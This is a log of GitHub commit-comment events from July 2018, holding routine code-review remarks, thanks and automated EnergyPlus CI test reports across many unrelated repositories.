{"id":"8020067155","type":"CommitCommentEvent","actor":{"login":"miguel-l"},"repo":{"name":"locutus2/Stockfish"},"payload":{"comment":{"id":29838047,"position":null,"line":null,"path":null,"commit_id":"a45ec3c750d72408b35d35cfabe30e962e65b4c5","created_at":"2018-07-26T02:33:58Z","updated_at":"2018-07-26T02:33:58Z","author_association":"NONE","body":"Congrats!"}},"created_at":"2018-07-26T02:33:58Z"}
{"id":"8020067518","type":"CommitCommentEvent","actor":{"login":"VladGogolev"},"repo":{"name":"VladGogolev/SETest"},"payload":{"comment":{"id":29838048,"position":52,"line":52,"path":"Task3/DecoratorManager.php","commit_id":"a82691e4249c911fe99f1d6fb589fba8b3e6757f","created_at":"2018-07-26T02:34:07Z","updated_at":"2018-07-26T02:34:07Z","author_association":"OWNER","body":"Кеш не сохраняется. Добавить $this->cache->save($cacheItem);"}},"created_at":"2018-07-26T02:34:07Z"}
{"id":"8020067970","type":"CommitCommentEvent","actor":{"login":"ayanamist"},"repo":{"name":"shadowsocks/shadowsocks-go"},"payload":{"comment":{"id":29838049,"position":null,"line":null,"path":null,"commit_id":"2c9262b10454bf502978f51e234a3b32761f17b2","created_at":"2018-07-26T02:34:18Z","updated_at":"2018-07-26T02:34:18Z","author_association":"CONTRIBUTOR","body":"Google App Engine does not allow cgo. I plan to use ss protocol to encrypt traffic between my several instances."}},"created_at":"2018-07-26T02:34:18Z"}
{"id":"8020068522","type":"CommitCommentEvent","actor":{"login":"left-over-dinner"},"repo":{"name":"luyongtang/Summer_2018_Project"},"payload":{"comment":{"id":29838050,"position":null,"line":null,"path":null,"commit_id":"b54c5fc97def542d991f3dfd9151fd591a9ad201","created_at":"2018-07-26T02:34:30Z","updated_at":"2018-07-26T02:34:30Z","author_association":"COLLABORATOR","body":"For line 36 using fetched_data as paramater, that is good! To make the API more structured, could you please \r\n1. Create a separate function called setCenter( lat,lng ), and \r\n2. the body of this function is line 46 to 57 \r\n3. before line 30, call the function a.setCenter(fetched_data.area_center_lat, fetched_data.area_center_lng )\r\n4. Make the necessary correction to the remaining code according to 1,2,3\r\nThat's all! Awesome bro!"}},"created_at":"2018-07-26T02:34:30Z"}
{"id":"8020070603","type":"CommitCommentEvent","actor":{"login":"arthurkiller"},"repo":{"name":"shadowsocks/shadowsocks-go"},"payload":{"comment":{"id":29838051,"position":null,"line":null,"path":null,"commit_id":"2c9262b10454bf502978f51e234a3b32761f17b2","created_at":"2018-07-26T02:35:16Z","updated_at":"2018-07-26T02:35:16Z","author_association":"COLLABORATOR","body":"Ok, I will change the dependency in another commit"}},"created_at":"2018-07-26T02:35:16Z"}
{"id":"8020072076","type":"CommitCommentEvent","actor":{"login":"ayanamist"},"repo":{"name":"shadowsocks/shadowsocks-go"},"payload":{"comment":{"id":29838052,"position":null,"line":null,"path":null,"commit_id":"2c9262b10454bf502978f51e234a3b32761f17b2","created_at":"2018-07-26T02:35:50Z","updated_at":"2018-07-26T02:35:50Z","author_association":"CONTRIBUTOR","body":"Thank you"}},"created_at":"2018-07-26T02:35:50Z"}
{"id":"8020072294","type":"CommitCommentEvent","actor":{"login":"ZaphodBeebblebrox"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29838053,"position":null,"line":null,"path":null,"commit_id":"a9fa00935dde0ffa960d617559d61087115e0e16","created_at":"2018-07-26T02:35:56Z","updated_at":"2018-07-26T02:35:56Z","author_association":"MEMBER","body":"Whatever you think is best is fine with me."}},"created_at":"2018-07-26T02:35:56Z"}
{"id":"8020074431","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29838055,"position":null,"line":null,"path":null,"commit_id":"7128b1fcff620f11c2ba8476bd9d3311fa88d5e0","created_at":"2018-07-26T02:36:47Z","updated_at":"2018-07-26T02:36:47Z","author_association":"NONE","body":"use_eigen_HeatBalanceIntRadExchange (drewyh) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1676 of 1676 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.32%25-green.png)</a>\n"}},"created_at":"2018-07-26T02:36:47Z"}
{"id":"8020076121","type":"CommitCommentEvent","actor":{"login":"kevinclark"},"repo":{"name":"donteSmall/Fundamental_data_structures"},"payload":{"comment":{"id":29838058,"position":21,"line":21,"path":"LinkedList.py","commit_id":"1d109bdb3b24b7d10cfaf47b72fb8894c46f6523","created_at":"2018-07-26T02:37:24Z","updated_at":"2018-07-26T02:37:24Z","author_association":"NONE","body":"See [section 3.3.1](https://docs.python.org/3/reference/datamodel.html)"}},"created_at":"2018-07-26T02:37:24Z"}
{"id":"8020078280","type":"CommitCommentEvent","actor":{"login":"arthurkiller"},"repo":{"name":"shadowsocks/shadowsocks-go"},"payload":{"comment":{"id":29838065,"position":null,"line":null,"path":null,"commit_id":"2c9262b10454bf502978f51e234a3b32761f17b2","created_at":"2018-07-26T02:38:10Z","updated_at":"2018-07-26T02:38:10Z","author_association":"COLLABORATOR","body":"never mind"}},"created_at":"2018-07-26T02:38:10Z"}
{"id":"8020078813","type":"CommitCommentEvent","actor":{"login":"arthurkiller"},"repo":{"name":"shadowsocks/shadowsocks-go"},"payload":{"comment":{"id":29838066,"position":null,"line":null,"path":null,"commit_id":"2c9262b10454bf502978f51e234a3b32761f17b2","created_at":"2018-07-26T02:38:22Z","updated_at":"2018-07-26T02:38:22Z","author_association":"COLLABORATOR","body":"np"}},"created_at":"2018-07-26T02:38:22Z"}
{"id":"8020079098","type":"CommitCommentEvent","actor":{"login":"MrFanyan"},"repo":{"name":"MrFanyan/improved-octo-dollop"},"payload":{"comment":{"id":29838067,"position":null,"line":null,"path":null,"commit_id":"ddfd753cbea5ba628cb6627b3443bd97e320f64a","created_at":"2018-07-26T02:38:28Z","updated_at":"2018-07-26T02:38:28Z","author_association":"OWNER","body":"this is a nice day"}},"created_at":"2018-07-26T02:38:28Z"}
{"id":"8020079276","type":"CommitCommentEvent","actor":{"login":"1bardesign"},"repo":{"name":"transhumandesign/kag-base"},"payload":{"comment":{"id":29838069,"position":null,"line":null,"path":null,"commit_id":"a6b3e16a8789ef758ebbb7b4a72f6bbc879131f7","created_at":"2018-07-26T02:38:31Z","updated_at":"2018-07-26T02:38:31Z","author_association":"MEMBER","body":"It was more to prevent taking out kegs etc from beyond this range than\nanything else! I'm open to tweaks but I feel like most folks are just going\nto tap e when they're near the crate anyway rather than holding the button\nearly. The radius was honestly just for testing, it could be opened up a\nlittle without breaking anything\n\nOn Thu, 26 Jul. 2018, 9:04 am MrPotatobird, <notifications@github.com>\nwrote:\n\n> I dunno about this, I would rather revert it and have the default\n> mechanics - where you have access to the inventory button whenever you\n> press E but the button is grayed out outside of enableRadius.\n>\n> The normal inventory enableRadius is maybe a bit large but I feel that not\n> only does this change make the access range too small but it also doesn't\n> show a button at all if you press E out of range, so you can't press and\n> hold E until you're close enough like you can with default inventory button\n> / when inserting an item.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/transhumandesign/kag-base/commit/a6b3e16a8789ef758ebbb7b4a72f6bbc879131f7#commitcomment-29836772>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AXZuDtTA0d3Y6_Q-bDrOw5rfmbGacfIoks5uKPmMgaJpZM4Vg7i0>\n> .\n>\n"}},"created_at":"2018-07-26T02:38:31Z"}
{"id":"8020082732","type":"CommitCommentEvent","actor":{"login":"VladGogolev"},"repo":{"name":"VladGogolev/SETest"},"payload":{"comment":{"id":29838073,"position":28,"line":28,"path":"Task3/DecoratorManager.php","commit_id":"a82691e4249c911fe99f1d6fb589fba8b3e6757f","created_at":"2018-07-26T02:39:55Z","updated_at":"2018-07-26T02:39:55Z","author_association":"OWNER","body":"Логгер надо обьявить в конструкторе, иначе не будем получать сообщения об ошибках."}},"created_at":"2018-07-26T02:39:55Z"}
{"id":"8020085118","type":"CommitCommentEvent","actor":{"login":"shell1113"},"repo":{"name":"shell1113/hello-world"},"payload":{"comment":{"id":29838074,"position":null,"line":null,"path":null,"commit_id":"f7d803dc935c3974a434a09ef8f99790251d96e1","created_at":"2018-07-26T02:40:49Z","updated_at":"2018-07-26T02:40:49Z","author_association":"OWNER","body":"ccc"}},"created_at":"2018-07-26T02:40:49Z"}
{"id":"8020085180","type":"CommitCommentEvent","actor":{"login":"cjchapman"},"repo":{"name":"adobe-type-tools/afdko"},"payload":{"comment":{"id":29838075,"position":null,"line":null,"path":null,"commit_id":"ac6ec315271f88b90e8a788b5851bb1fcd4489f2","created_at":"2018-07-26T02:40:50Z","updated_at":"2018-07-26T02:40:50Z","author_association":"CONTRIBUTOR","body":"@miguelsousa Yes. That sounds good to me."}},"created_at":"2018-07-26T02:40:50Z"}
{"id":"8020089143","type":"CommitCommentEvent","actor":{"login":"VladGogolev"},"repo":{"name":"VladGogolev/SETest"},"payload":{"comment":{"id":29838081,"position":28,"line":28,"path":"Task3/DecoratorManager.php","commit_id":"a82691e4249c911fe99f1d6fb589fba8b3e6757f","created_at":"2018-07-26T02:42:18Z","updated_at":"2018-07-26T02:42:18Z","author_association":"OWNER","body":"Если оставить публичный метод, то Логгер можно запросто забыть установить. Нужно объявить в конструкторе, иначе не будем получать сообщения об ошибках. "}},"created_at":"2018-07-26T02:42:18Z"}
{"id":"8020091095","type":"CommitCommentEvent","actor":{"login":"gitzhouyc"},"repo":{"name":"gitzhouyc/yczhou"},"payload":{"comment":{"id":29838084,"position":null,"line":null,"path":null,"commit_id":"2dcbc7f826915a249af0d76dd7fcb0fa8a2cdce6","created_at":"2018-07-26T02:43:03Z","updated_at":"2018-07-26T02:43:03Z","author_association":"OWNER","body":"项目搭建\r\n"}},"created_at":"2018-07-26T02:43:03Z"}
{"id":"8020091158","type":"CommitCommentEvent","actor":{"login":"nhat-phan"},"repo":{"name":"quangnguyen30192/laravel-firstapp"},"payload":{"comment":{"id":29838085,"position":61,"line":366,"path":"readme.md","commit_id":"8817fe23f4fb5d89cd3733bf37106aea4588649b","created_at":"2018-07-26T02:43:05Z","updated_at":"2018-07-26T02:43:05Z","author_association":"NONE","body":"Use mariadb, set no password. Use docker if you can.\r\n\r\n1. Install docker for mac\r\n2. Run commands\r\n\r\n```\r\ndocker rm -v mariadb\r\ndocker run -p \"3306:3306\" -e MYSQL_ALLOW_EMPTY_PASSWORD=1 --name mariadb -d mariadb\r\n```"}},"created_at":"2018-07-26T02:43:05Z"}
{"id":"8020091946","type":"CommitCommentEvent","actor":{"login":"jims10d"},"repo":{"name":"jims10d/sportman-loopback"},"payload":{"comment":{"id":29838086,"position":null,"line":null,"path":null,"commit_id":"b275a9ce87c8728b77c060c679a20df4a1de0620","created_at":"2018-07-26T02:43:20Z","updated_at":"2018-07-26T02:43:20Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/5a7e57bc-5410-437d-95a5-d427815f5ebc?env_id=ibm%3Ayp%3Aus-south \"sportman-loopback\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/db4be768-68e6-447f-9187-7d1ee9f620cc?env_id=ibm%3Ayp%3Aus-south \"sportman-loopback\") deployed [sportman-loopback](https://github.com/jims10d/sportman-loopback/releases/tag/deploy-ibm-yp-us-south-jims10d-simpleSpace-20180726-024320 \"deploy-ibm-yp-us-south-jims10d-simpleSpace-20180726-024320\") to [simpleSpace](https://console.bluemix.net/apps/12384bdb-7ac1-45d2-b63b-7d0a3532c568?env_id=ibm:yp:us-south \"ibm:yp:us-south:jims10d:simpleSpace\"), including this commit"}},"created_at":"2018-07-26T02:43:20Z"}
{"id":"8020094594","type":"CommitCommentEvent","actor":{"login":"Ryoalrui"},"repo":{"name":"Ryoalrui/Practice"},"payload":{"comment":{"id":29838090,"position":null,"line":null,"path":null,"commit_id":"de549cfa67183f78d608cc514b251ed60ad9b9c6","created_at":"2018-07-26T02:44:13Z","updated_at":"2018-07-26T02:44:13Z","author_association":"OWNER","body":"a"}},"created_at":"2018-07-26T02:44:13Z"}
{"id":"8020100989","type":"CommitCommentEvent","actor":{"login":"canro91"},"repo":{"name":"canro91/Parsinator"},"payload":{"comment":{"id":29838097,"position":null,"line":null,"path":null,"commit_id":"6f170cbcc5516bc3ce162c7b39a3c64f5327b803","created_at":"2018-07-26T02:46:34Z","updated_at":"2018-07-26T02:46:34Z","author_association":"OWNER","body":"@rcuello It addresses #1"}},"created_at":"2018-07-26T02:46:34Z"}
{"id":"8020102099","type":"CommitCommentEvent","actor":{"login":"zhangkangSY123"},"repo":{"name":"zhangkangSY123/SKP_WS"},"payload":{"comment":{"id":29838098,"position":null,"line":null,"path":null,"commit_id":"0d64824c4b4caf9eff41bbead474c33c6d6b1f5a","created_at":"2018-07-26T02:46:58Z","updated_at":"2018-07-26T02:46:58Z","author_association":"OWNER","body":"有问题，删除"}},"created_at":"2018-07-26T02:46:58Z"}
{"id":"8020104998","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29838103,"position":null,"line":null,"path":null,"commit_id":"8c6a38ae74be4ac99056e05742d42148e0b3206c","created_at":"2018-07-26T02:48:05Z","updated_at":"2018-07-26T02:48:05Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (rraustad) - i386-Windows-7-VisualStudio-14: OK (2943 of 2946 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 3 tests had: EIO diffs.\n * 3 tests had: Table big diffs.\n * 2 tests had: ESO big diffs.\n * 2 tests had: MTR big diffs.\n * 1 test had: ERR diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 620\n * Failed: 3\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8c6a38ae74be4ac99056e05742d42148e0b3206c-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8c6a38ae74be4ac99056e05742d42148e0b3206c-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.9%25-yellow.png)</a> \n"}},"created_at":"2018-07-26T02:48:05Z"}
{"id":"8020107896","type":"CommitCommentEvent","actor":{"login":"tramstheman"},"repo":{"name":"North-Vine-Engineering/ibs-server"},"payload":{"comment":{"id":29838104,"position":8,"line":8,"path":"internal/core/src/main/kotlin/org/nve/services/MessagingService.kt","commit_id":"e88c9cb0fd7782d42fc36115fa318cef3c4c926d","created_at":"2018-07-26T02:49:16Z","updated_at":"2018-07-26T02:49:16Z","author_association":"CONTRIBUTOR","body":"This method should not return anything. The message is pushed out so we don't need it returned back to us. Our symbol of the MimeMessage is the message we are pushing into this method. Ideally if there was a failure in the implementation of this method it would throw an exception. "}},"created_at":"2018-07-26T02:49:16Z"}
{"id":"8020110555","type":"CommitCommentEvent","actor":{"login":"tramstheman"},"repo":{"name":"North-Vine-Engineering/ibs-server"},"payload":{"comment":{"id":29838108,"position":66,"line":59,"path":"internal/aws/src/test/kotlin/org/nve/service/LocalMessagingServiceImplTest.kt","commit_id":"e88c9cb0fd7782d42fc36115fa318cef3c4c926d","created_at":"2018-07-26T02:50:18Z","updated_at":"2018-07-26T02:50:18Z","author_association":"CONTRIBUTOR","body":"Because we are not going to be returning a message we actually don't need to assert anything in here. All the assertions are going to be in our expectations above. "}},"created_at":"2018-07-26T02:50:18Z"}
{"id":"8020110779","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29838109,"position":null,"line":null,"path":null,"commit_id":"a67315d714db773a77cafab9807cc9859c38a74b","created_at":"2018-07-26T02:50:23Z","updated_at":"2018-07-26T02:50:23Z","author_association":"NONE","body":"develop (mjwitte) - x86_64-MacOS-10.9-clang: OK (2322 of 2322 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a67315d714db773a77cafab9807cc9859c38a74b-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a67315d714db773a77cafab9807cc9859c38a74b-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-26T02:50:23Z"}
{"id":"8020113663","type":"CommitCommentEvent","actor":{"login":"tramstheman"},"repo":{"name":"North-Vine-Engineering/ibs-server"},"payload":{"comment":{"id":29838111,"position":45,"line":41,"path":"internal/aws/src/test/kotlin/org/nve/service/LocalMessagingServiceImplTest.kt","commit_id":"e88c9cb0fd7782d42fc36115fa318cef3c4c926d","created_at":"2018-07-26T02:51:26Z","updated_at":"2018-07-26T02:51:26Z","author_association":"CONTRIBUTOR","body":"We are going to want a mock Static Transport not a mock instance. I actually forget how to do this but you can look it up in the powermock specification. This is why you were running into some issues in your expects though (pointing to your commented out lines)"}},"created_at":"2018-07-26T02:51:26Z"}
{"id":"8020113716","type":"CommitCommentEvent","actor":{"login":"Jekaa"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29838112,"position":null,"line":null,"path":null,"commit_id":"ad8538c5f1d45549ef8962ceee37b37724cb218e","created_at":"2018-07-26T02:51:28Z","updated_at":"2018-07-26T02:51:28Z","author_association":"NONE","body":"Congrats! From the very beginning I did not understand why this condition is here."}},"created_at":"2018-07-26T02:51:28Z"}
{"id":"8020116447","type":"CommitCommentEvent","actor":{"login":"zdmGitHub"},"repo":{"name":"zdmGitHub/Hello-world"},"payload":{"comment":{"id":29838113,"position":2,"line":2,"path":"README.md","commit_id":"89eb43d981f6ce950b9bdf48f9f1960ff56ae909","created_at":"2018-07-26T02:52:29Z","updated_at":"2018-07-26T02:52:29Z","author_association":"OWNER","body":"welcome"}},"created_at":"2018-07-26T02:52:29Z"}
{"id":"8020119942","type":"CommitCommentEvent","actor":{"login":"GodlyFoox"},"repo":{"name":"MonikaDiscord/Monika"},"payload":{"comment":{"id":29838121,"position":null,"line":null,"path":null,"commit_id":"50540416f4a81184e9858c15a6f763d727e4feb6","created_at":"2018-07-26T02:53:48Z","updated_at":"2018-07-26T02:53:48Z","author_association":"NONE","body":"$!despacito "}},"created_at":"2018-07-26T02:53:48Z"}
{"id":"8020128207","type":"CommitCommentEvent","actor":{"login":"akhilnarang"},"repo":{"name":"Hlcpereira/scripts"},"payload":{"comment":{"id":29838128,"position":null,"line":null,"path":null,"commit_id":"01c5bb1328cfb851094bfc169c6e8d85861065ed","created_at":"2018-07-26T02:56:48Z","updated_at":"2018-07-26T02:56:48Z","author_association":"NONE","body":"WTF lol"}},"created_at":"2018-07-26T02:56:48Z"}
{"id":"8020129780","type":"CommitCommentEvent","actor":{"login":"arthurkiller"},"repo":{"name":"shadowsocks/shadowsocks-go"},"payload":{"comment":{"id":29838131,"position":null,"line":null,"path":null,"commit_id":"2c9262b10454bf502978f51e234a3b32761f17b2","created_at":"2018-07-26T02:57:21Z","updated_at":"2018-07-26T02:57:21Z","author_association":"COLLABORATOR","body":"@ayanamist  I will not use aead/chacha20\r\n\r\ninstead\r\n\r\n> \"golang.org/x/crypto/chacha20poly1305\"\r\n\r\nis better."}},"created_at":"2018-07-26T02:57:21Z"}
{"id":"8020130140","type":"CommitCommentEvent","actor":{"login":"gilbode"},"repo":{"name":"markxnelson/spinnaker.github.io"},"payload":{"comment":{"id":29838132,"position":23,"line":2680,"path":"reference/halyard/commands.md","commit_id":"bf3dbd8b54ee142829ecdbcf05de3f7b994993c2","created_at":"2018-07-26T02:57:29Z","updated_at":"2018-07-26T02:57:29Z","author_association":"NONE","body":"Change wercker to Wercker - can you hyperlink?  If so would suggest a link to www.wercker.com or devcenter.wercker.com."}},"created_at":"2018-07-26T02:57:29Z"}
{"id":"8020131536","type":"CommitCommentEvent","actor":{"login":"winonecheng"},"repo":{"name":"chuchujenny/X-Village-HW1"},"payload":{"comment":{"id":29838133,"position":11,"line":16,"path":"matrix.py","commit_id":"5a2bd03aece4f52efc7a40ee7fcc50bdc6b542b0","created_at":"2018-07-26T02:58:00Z","updated_at":"2018-07-26T02:58:00Z","author_association":"NONE","body":"list 要新增 element，通常會使用 `append`，所以這行可以寫成 `m.append(random.randint(0,9))`"}},"created_at":"2018-07-26T02:58:00Z"}
{"id":"8020131996","type":"CommitCommentEvent","actor":{"login":"ajblane"},"repo":{"name":"ajblane/dcurl"},"payload":{"comment":{"id":29838134,"position":42,"line":133,"path":"Makefile","commit_id":"0100646d2d101bb7142e33996c4ffe6ed6a53c49","created_at":"2018-07-26T02:58:10Z","updated_at":"2018-07-26T02:58:10Z","author_association":"OWNER","body":"Check for 0cb4a3e9219587d47f5d6fcb78d5071204704891"}},"created_at":"2018-07-26T02:58:10Z"}
{"id":"8020134167","type":"CommitCommentEvent","actor":{"login":"ajblane"},"repo":{"name":"ajblane/dcurl"},"payload":{"comment":{"id":29838136,"position":5,"line":91,"path":"src/converter.c","commit_id":"0100646d2d101bb7142e33996c4ffe6ed6a53c49","created_at":"2018-07-26T02:59:00Z","updated_at":"2018-07-26T02:59:00Z","author_association":"OWNER","body":"Check for 90cde2dc05d2a15eba4dc7bebe32cbf01f4a7652"}},"created_at":"2018-07-26T02:59:00Z"}
{"id":"8020135404","type":"CommitCommentEvent","actor":{"login":"gilbode"},"repo":{"name":"markxnelson/spinnaker.github.io"},"payload":{"comment":{"id":29838137,"position":74,"line":2731,"path":"reference/halyard/commands.md","commit_id":"bf3dbd8b54ee142829ecdbcf05de3f7b994993c2","created_at":"2018-07-26T02:59:27Z","updated_at":"2018-07-26T02:59:27Z","author_association":"NONE","body":"Wercker has no concept of master, this needs explanation as to what it means."}},"created_at":"2018-07-26T02:59:27Z"}
{"id":"8020136711","type":"CommitCommentEvent","actor":{"login":"nsemmler"},"repo":{"name":"SuryaKrishnaMoorthy/galvanize_task_tracker_front_end"},"payload":{"comment":{"id":29838139,"position":null,"line":null,"path":null,"commit_id":"ea5604c8156c6be463d765356ec60f0ed426cd2c","created_at":"2018-07-26T02:59:56Z","updated_at":"2018-07-26T02:59:56Z","author_association":"COLLABORATOR","body":"Merge into branch nate"}},"created_at":"2018-07-26T02:59:56Z"}
{"id":"8024895630","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"jasondegraw/EnergyPlus"},"payload":{"comment":{"id":29849393,"position":null,"line":null,"path":null,"commit_id":"753c45b97a391b05fc27e5fc86f10adc084ac7e8","created_at":"2018-07-26T20:00:00Z","updated_at":"2018-07-26T20:00:00Z","author_association":"NONE","body":"fix-eio-wind-angles (jasondegraw) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: Tests Failed (2394 of 2964 tests passed, 57 test warnings)\n\nMessages:\n\n * 627 tests had: EIO diffs.\n * 566 tests had: Table big diffs.\n * 1 test had: BND diffs.\n * 84 tests had: ESO big diffs.\n * 173 tests had: ESO small diffs.\n * 91 tests had: AUD diffs.\n * 39 tests had: MTR big diffs.\n * 106 tests had: MTR small diffs.\n * 19 tests had: ERR diffs.\n * 2 tests had: MTD diffs.\n * 1 test had: SSZ big diffs.\n * 1 test had: ZSZ big diffs.\n * 1 test had: Table small diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 73\n * Failed: 570\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-753c45b97a391b05fc27e5fc86f10adc084ac7e8-PR6858-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-753c45b97a391b05fc27e5fc86f10adc084ac7e8-PR6858-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-80.77%25-red.png)</a> \n"}},"created_at":"2018-07-26T20:00:00Z"}
{"id":"8024903458","type":"CommitCommentEvent","actor":{"login":"kirbyfan64"},"repo":{"name":"nim-lang/Nim"},"payload":{"comment":{"id":29849410,"position":5,"line":127,"path":"lib/pure/asyncdispatch.nim","commit_id":"202cc489034f6e4f41140d7af82e93b112fcd3dd","created_at":"2018-07-26T20:01:31Z","updated_at":"2018-07-26T20:01:31Z","author_association":"CONTRIBUTOR","body":"This has been fixed for [two years](https://github.com/nim-lang/Nim/issues/1970). Should this comment be removed now?"}},"created_at":"2018-07-26T20:01:31Z"}
{"id":"8024905677","type":"CommitCommentEvent","actor":{"login":"ShmooDude"},"repo":{"name":"mwojtkowski/Ovale"},"payload":{"comment":{"id":29849418,"position":null,"line":null,"path":null,"commit_id":"5fee20655acba9328b9aba665075d191db7afe1d","created_at":"2018-07-26T20:01:59Z","updated_at":"2018-07-26T20:01:59Z","author_association":"NONE","body":"Ovale has its own custom messages for a few of the events you registered.  I think it's done this way because not every event firing may result in an actual change.  Might also reduce the overhead associated with the events.\r\n\r\n`this.RegisterMessage(\"Ovale_EquipmentChanged\", \"UpdateTraits\");` instead of \r\n`this.RegisterEvent(\"PLAYER_EQUIPMENT_CHANGED\", \"UpdateTraits\");`\r\n\r\n`this.RegisterMessage(\"Ovale_SpellsChanged\", \"UpdateTraits\");` instead of \r\n`this.RegisterEvent(\"SPELLS_CHANGED\", \"UpdateTraits\");`\r\n\r\n`this.RegisterMessage(\"Ovale_SpecializationChanged\", \"UpdateTraits\")` instead of\r\n`this.RegisterEvent(\"PLAYER_SPECIALIZATION_CHANGED\", \"UpdateTraits\")`\r\n\r\nAlso, a couple notes:\r\nWouldn't the proper event be `AZERITE_EMPOWERED_ITEM_SELECTION_UPDATED`?  I haven't messed with it yet but it returns an item location so this seems like the correct event.\r\nThere's also only 3 valid slots for Azerite items (helm, shoulders and chest I believe) so there shouldn't be a need to loop through all the equipment even when scanning all azerite items."}},"created_at":"2018-07-26T20:01:59Z"}
{"id":"8024906637","type":"CommitCommentEvent","actor":{"login":"DrRSatzteil"},"repo":{"name":"DrRSatzteil/documentmanager"},"payload":{"comment":{"id":29849422,"position":11,"line":9,"path":"lib/Database/OrganisationMapper.php","commit_id":"ce66e5c0b5e41177c5d46cf71b812f42c0ed80e6","created_at":"2018-07-26T20:02:12Z","updated_at":"2018-07-26T20:02:12Z","author_association":"OWNER","body":"Oops, ok :D\r\n\r\nSorry then. My bad!"}},"created_at":"2018-07-26T20:02:12Z"}
{"id":"8024908411","type":"CommitCommentEvent","actor":{"login":"marcoscenteno89"},"repo":{"name":"marcoscenteno89/WPTheme"},"payload":{"comment":{"id":29849423,"position":null,"line":null,"path":null,"commit_id":"51a5a186f3847a82f380d6af2868c2b001db8943","created_at":"2018-07-26T20:02:35Z","updated_at":"2018-07-26T20:02:35Z","author_association":"OWNER","body":"back to first commit"}},"created_at":"2018-07-26T20:02:35Z"}
{"id":"8024908688","type":"CommitCommentEvent","actor":{"login":"AustinVirts"},"repo":{"name":"OriginProtocol/origin-website"},"payload":{"comment":{"id":29849424,"position":null,"line":null,"path":null,"commit_id":"2518ff5003f3987bb0c169f14c9c8525227e64cd","created_at":"2018-07-26T20:02:39Z","updated_at":"2018-07-26T20:02:39Z","author_association":"CONTRIBUTOR","body":"Thanks Josh! Was just about to put a request in for this @joshfraser "}},"created_at":"2018-07-26T20:02:39Z"}
{"id":"8024909554","type":"CommitCommentEvent","actor":{"login":"dmiralles2009"},"repo":{"name":"dmiralles2009/gnss-sdr"},"payload":{"comment":{"id":29849427,"position":67,"line":161,"path":"src/core/system_parameters/beidou_cnav2_navigation_message.cc","commit_id":"fcee0032e4582d78e84b35a81c407e364e466161","created_at":"2018-07-26T20:02:49Z","updated_at":"2018-07-26T20:02:49Z","author_association":"OWNER","body":"Use a constant for the 264 bit size, it is after all the beidou cnav data size and you could define that as a constant in your Beidou B2a.h file"}},"created_at":"2018-07-26T20:02:49Z"}
{"id":"8024910118","type":"CommitCommentEvent","actor":{"login":"japaric"},"repo":{"name":"riscv-rust/rust"},"payload":{"comment":{"id":29849428,"position":4,"line":380,"path":"src/librustc_target/spec/mod.rs","commit_id":"9fab077ed2144f70801a128e0b93a923340c4eac","created_at":"2018-07-26T20:02:57Z","updated_at":"2018-07-26T20:02:57Z","author_association":"NONE","body":"So far we have been using the format `$ARCH$SUBARCH-$OS-$ENV_OR_FORMAT` for the triple names. Applying to format here would yield `riscv32-none-elf`, which is close to the existing `msp430-none-elf` triple. But since RISCV target features are orthogonal to the subarchitecture we may want to use `riscv32+imac-none-elf` here, maybe. in any case, we'll discuss the name in the PR."}},"created_at":"2018-07-26T20:02:57Z"}
